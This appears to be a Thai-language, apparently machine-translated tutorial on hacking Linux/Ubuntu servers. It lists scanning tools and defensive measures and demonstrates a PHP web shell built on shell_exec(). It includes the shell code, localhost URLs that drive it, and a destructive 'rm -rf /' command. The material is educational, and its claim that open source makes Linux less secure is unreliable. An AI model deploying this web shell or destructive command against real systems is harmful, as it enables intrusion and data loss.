การแฮ็กระบบปฏิบัติการ Linux: การแฮ็กด้วย Ubuntu (บทช่วยสอนคำสั่ง)
Linux เป็นระบบปฏิบัติการเซิร์ฟเวอร์ที่ใช้กันอย่างแพร่หลาย โดยเฉพาะอย่างยิ่งสำหรับเว็บเซิร์ฟเวอร์ Linux เป็นโอเพ่นซอร์ส ซึ่งหมายความว่าใครๆ ก็สามารถเข้าถึงโค้ดต้นฉบับได้ ซึ่งทำให้มีความปลอดภัยน้อยลงเมื่อเทียบกับระบบปฏิบัติการอื่น เนื่องจากผู้โจมตีสามารถศึกษาโค้ดต้นฉบับเพื่อค้นหาช่องโหว่ได้. ลินุกซ์ สำหรับแฮกเกอร์คือการใช้ประโยชน์จากช่องโหว่เหล่านี้เพื่อเข้าถึงระบบโดยไม่ได้รับอนุญาต
ในบทความนี้ เราจะแนะนำให้คุณรู้จักว่า Linux คืออะไร ช่องโหว่ด้านความปลอดภัย และการแฮ็กด้วย Ubuntu และมาตรการตอบโต้ที่คุณสามารถนำไปใช้ได้
หมายเหตุด่วนบน Linux
ลินุกซ์เป็นระบบปฏิบัติการโอเพ่นซอร์สระบบปฏิบัติการที่ใช้ Linux มีอยู่มากมาย เช่น Redhat, Fedora และ Ubuntu, ฯลฯ ต่างจากระบบปฏิบัติการอื่น Linux มีความปลอดภัยน้อยกว่าเมื่อเป็นเรื่องของความปลอดภัย นั่นเป็นเพราะซอร์สโค้ดนั้นเปิดให้ใช้งานได้ฟรี ดังนั้นจึงง่ายต่อการศึกษาช่องโหว่และใช้ประโยชน์จากช่องโหว่เหล่านั้นเมื่อเทียบกับระบบปฏิบัติการอื่นที่ไม่ใช่โอเพนซอร์ส Linux สามารถใช้เป็นระบบปฏิบัติการเซิร์ฟเวอร์ เดสก์ท็อป แท็บเล็ต หรืออุปกรณ์พกพาได้
โปรแกรม Linux สามารถใช้งานโดยใช้ GUI หรือคำสั่ง คำสั่ง Linux สำหรับ Kali Linux การแฮ็กมีประสิทธิภาพและประสิทธิผลมากกว่าเมื่อเทียบกับการใช้ GUI ด้วยเหตุนี้ การรู้คำสั่งพื้นฐานของ Linux สำหรับการแฮ็กจึงช่วยได้มาก
อ้างถึงบทช่วยสอนเหล่านี้ https://www.guru99.com/unix-linux-tutorial.html เกี่ยวกับวิธีการเริ่มต้นใช้งาน Kali Linux แฮ็ก
เครื่องมือแฮ็ก Linux
- Nessus– สามารถใช้เครื่องมือนี้ได้ Ubuntu แฮ็ก การตั้งค่าการสแกน แพตช์ และเครือข่าย ฯลฯ สามารถพบได้ที่ https://www.tenable.com/products/nessus
- Nแผนที่ เครื่องมือนี้สามารถใช้เพื่อตรวจสอบโฮสต์ที่ทำงานบนเซิร์ฟเวอร์และบริการที่พวกเขาใช้งานอยู่ นอกจากนี้ยังสามารถใช้เพื่อสแกนหาพอร์ตต่างๆ สามารถพบได้ที่ https://nmap.org/
- ซาร่า – SARA เป็นตัวย่อสำหรับผู้ช่วยวิจัยของผู้ตรวจสอบความปลอดภัย ตามที่ชื่อบอกเป็นนัย เครื่องมือนี้สามารถใช้เพื่อตรวจสอบเครือข่ายจากภัยคุกคามต่างๆ เช่น ด้วย SQL Injection, XSS ฯลฯ สามารถดูได้ที่ http://www-arc.com/sara/sara.html
รายการข้างต้นยังไม่ครบถ้วนสมบูรณ์ มันช่วยให้คุณมีแนวคิดเกี่ยวกับเครื่องมือที่มีให้ Ubuntu การแฮ็กและแฮ็กระบบ Linux
วิธีป้องกันการแฮ็ก Linux
การแฮ็กระบบ Linux ใช้ประโยชน์จากช่องโหว่ในระบบปฏิบัติการ องค์กรสามารถใช้แนวทางต่อไปนี้เพื่อป้องกันตนเองจากการโจมตีดังกล่าว
- การจัดการแพทช์– แพตช์แก้ไขข้อบกพร่องที่ผู้โจมตีใช้โจมตีระบบ นโยบายการจัดการแพตช์ที่ดีจะทำให้แน่ใจได้ว่าคุณจะนำแพตช์ที่เกี่ยวข้องไปใช้กับระบบของคุณอย่างต่อเนื่อง
- การกำหนดค่าระบบปฏิบัติการที่เหมาะสม– ช่องโหว่อื่นๆ ใช้ประโยชน์จากจุดอ่อนในการกำหนดค่าเซิร์ฟเวอร์ ควรปิดใช้งานชื่อผู้ใช้และเดมอนที่ไม่ได้ใช้งาน การตั้งค่าเริ่มต้น เช่น รหัสผ่านทั่วไปสำหรับแอปพลิเคชัน ชื่อผู้ใช้เริ่มต้น และหมายเลขพอร์ตบางตัว ควรเปลี่ยน
- ระบบตรวจจับการบุกรุก– เครื่องมือดังกล่าวสามารถใช้เพื่อตรวจจับการเข้าถึงระบบโดยไม่ได้รับอนุญาต เครื่องมือบางอย่างมีความสามารถในการตรวจจับและป้องกันการโจมตีดังกล่าว
กิจกรรมการแฮ็ก: แฮ็กก Ubuntu ระบบ Linux โดยใช้ PHP
ในสถานการณ์จริงนี้ เราจะได้เรียนรู้วิธีแฮ็กด้วย Ubuntu และเราจะให้ข้อมูลพื้นฐานเกี่ยวกับวิธีการใช้งานแก่คุณ PHP เพื่อประนีประนอมกับ Linux เราจะไม่มุ่งเป้าไปที่เหยื่อใดๆ หากคุณต้องการทดลองใช้งาน คุณสามารถติดตั้ง LAMPP บนเครื่องของคุณได้
PHP มาพร้อมกับสองฟังก์ชันที่สามารถใช้เพื่อรันคำสั่งแฮ็ก Linux มีฟังก์ชัน exec() และ shell_exec() ฟังก์ชัน exec() ส่งคืนบรรทัดสุดท้ายของเอาต์พุตคำสั่ง ในขณะที่ shell_exec() ส่งคืนผลลัพธ์ทั้งหมดของคำสั่งในรูปแบบสตริง
เพื่อวัตถุประสงค์ในการสาธิต สมมติว่าผู้โจมตีจัดการการอัปโหลดไฟล์ต่อไปนี้บนเว็บเซิร์ฟเวอร์
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
ที่นี่
สคริปต์ด้านบนได้รับคำสั่งจากตัวแปร GET ชื่อ cmd คำสั่งดำเนินการโดยใช้ shell_exec() และผลลัพธ์ที่ส่งคืนในเบราว์เซอร์
โค้ดด้านบนสามารถใช้ประโยชน์ได้โดยใช้ URL ต่อไปนี้
http://localhost/cp/konsole.php?cmd=ls%20-l
ที่นี่
- “…konsole.php?cmd=ls%20-l”กำหนดค่า ls –l ให้กับตัวแปร cmd.
คำสั่งใน Ubuntu สำหรับการแฮ็คกับเซิร์ฟเวอร์จะถูกดำเนินการดังนี้
shell_exec('ls -l') ;
การดำเนินการโค้ดข้างต้นบนเว็บเซิร์ฟเวอร์จะให้ผลลัพธ์ที่คล้ายกับต่อไปนี้
คำสั่งดังกล่าวจะแสดงไฟล์ในไดเร็กทอรีปัจจุบันและการอนุญาต
สมมติว่าผู้โจมตีส่งคำสั่งต่อไปนี้
rm -rf /
ที่นี่
- “rm” จะลบไฟล์
- “rf” ทำให้คำสั่ง rm ทำงานในโหมดเรียกซ้ำ การลบโฟลเดอร์และไฟล์ทั้งหมด
- “/” สั่งให้คำสั่งเริ่มการลบไฟล์ออกจากไดเร็กทอรีราก
URL การโจมตีจะมีลักษณะดังนี้
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
สรุป
- Linux เป็นระบบปฏิบัติการยอดนิยมสำหรับเซิร์ฟเวอร์ เดสก์ท็อป แท็บเล็ต และอุปกรณ์พกพา
- ลินุกซ์ เป็นโอเพ่นซอร์สและทุกคนสามารถรับซอร์สโค้ดได้ ทำให้ง่ายต่อการมองเห็นจุดอ่อน มันเป็นหนึ่งในระบบปฏิบัติการที่ดีที่สุดสำหรับแฮกเกอร์
- คำสั่งแฮ็คพื้นฐานและเครือข่ายใน Ubuntu มีคุณค่าสำหรับแฮกเกอร์ Linux
- ช่องโหว่เป็นจุดอ่อนที่สามารถนำไปใช้เพื่อประนีประนอมระบบได้
- การรักษาความปลอดภัยที่ดีสามารถช่วยปกป้องระบบจากการถูกบุกรุกโดยผู้โจมตีได้